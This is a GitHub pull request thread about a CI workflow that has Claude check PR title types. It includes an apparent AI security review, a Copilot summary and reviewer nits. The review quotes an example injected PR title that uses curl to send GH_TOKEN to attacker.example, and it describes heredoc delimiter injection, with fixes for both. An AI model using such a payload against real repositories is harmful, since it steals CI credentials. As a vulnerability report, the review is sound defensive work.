ci: add CI workflow to validate PR title type against changed files

[pbeza]

Fixes #2154

[claude]

Review: PR #2155

1. Shell command injection via PR title (High)

.github/workflows/pr-title-lint.yml:58 — The PR title is echoed with double quotes:

echo "PR TITLE: $PR_TITLE"

Double-quoted strings in bash interpret $(...) and backtick subshells. A malicious PR author can set their title to:

feat: $(curl https://attacker.example/exfil?token=$GH_TOKEN)

and the shell will execute the subshell expansion before echoing. This is a command injection vulnerability. The GH_TOKEN (set on line 53) is in scope and could be exfiltrated.

Fix: Use printf '%s\n' to safely write untrusted values, or avoid the shell entirely:

printf 'PR TITLE: %s\n' "$PR_TITLE"

2. Heredoc delimiter injection via PR title (Medium)

Same line — if a PR title contains the literal text PROMPT_EOF on its own, it prematurely closes the GITHUB_ENV heredoc block. Any content after that line would be parsed as new environment variable definitions, allowing injection of arbitrary env vars into subsequent steps.

Fix: Use a more unique/random delimiter, and still apply the printf fix from issue 1.

3. pull-requests: read is insufficient for commenting (Functional bug)

The job declares pull-requests: read, but the prompt instructs Claude to run gh pr comment, which requires pull-requests: write. The comment step will always fail with a 403. This needs to be pull-requests: write — but that also increases the blast radius of the injection issues above, so fix those first.

4. id-token: write permission is unnecessary (Low)

Unless the claude-code-action is authenticating via OIDC to a cloud provider (AWS Bedrock, GCP Vertex, etc.), id-token: write is not needed. Since the workflow uses anthropic_api_key directly, this permission should be removed per least-privilege principle.

⚠️ Issues found — the shell injection on line 58 should be fixed before merge.

[Copilot]

Pull request overview

Adds an additional CI check to help keep squash-merge commit history/changelog clean by ensuring PR titles use an appropriate Conventional Commit type based on the files changed (per Issue #2154).

Changes:

• Adds a check-pr-title-type job to the existing PR title lint workflow.
• Builds an LLM prompt containing PR title + changed file list and runs anthropics/claude-code-action to decide whether to comment with a suggested type.
• Introduces a prompt file defining the classification rules and expected behavior/output.

Reviewed changes

Copilot reviewed 2 out of 2 changed files in this pull request and generated 4 comments.

File	Description
.github/workflows/pr-title-lint.yml	Adds the new non-blocking title-type validation job using Claude and gh to comment.
.github/prompts/pr-title-check.prompt.md	Defines the rules and output format for deciding whether the PR title type matches changed files.

---

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

[netrome]

Nice!

[gilcu3]

LGTM

[DSharifi]

Nit:
Title should be ci:

[pbeza]

Nit:
Title should be ci:

Ah, that was part of the tests — forgot to revert it. Thanks! 😄